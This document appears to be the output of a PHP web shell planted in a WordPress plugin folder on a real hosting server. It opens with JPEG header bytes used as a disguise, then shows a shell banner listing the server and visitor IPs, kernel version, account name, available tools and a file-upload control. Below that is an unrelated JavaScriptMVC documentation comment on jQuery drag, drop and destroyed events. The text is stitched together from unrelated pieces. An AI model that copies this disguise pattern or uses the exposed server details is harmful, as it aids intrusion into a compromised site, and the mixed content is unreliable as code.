????JFIF??x?x????'
Server IP : 104.21.64.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/peekmysite.com/wp-content/plugins/motopress-content-editor/jquery/event/ |
Upload File : |
/** * @page specialevents Special Events * @parent jquerymx * @description Special events like drag-drop. * * JavaScriptMVC provides a bunch of useful special events. Find out more info on the left. The following is a * brief summary: * * ## [jQuery.event.special.default Default Events] * * Lets you supply default behavior for an event that is preventable * with event.preventDefault(). This is extremely useful for providing DOM-like api's for your widgets. * * $("#tabs").delegate(".panel","default.open", function(){ * $(this).show() * }) * * ## [jQuery.event.special.destroyed Destroyed Events] * * Know if an element has been removed from the page. * * $("#contextMenu").bind("destroyed", function(){ * // cleanup * $(document.body).unbind("click.contextMenu"); * }) * * ## [jQuery.Drag Drag] and [jQuery.Drop Drop] Events * * Listen to drag-drop events with event delegation. * * $(".item").live("dragover", function(ev, drag){ * // let user know that the item can be dropped * $(this).addClass("canDrop"); * }).live("dropover", function(ev, drop, drag){ * // let user know that the item can be dropped on * $(this).addClass('drop-able') * }) * * ## * */ steal('jquery');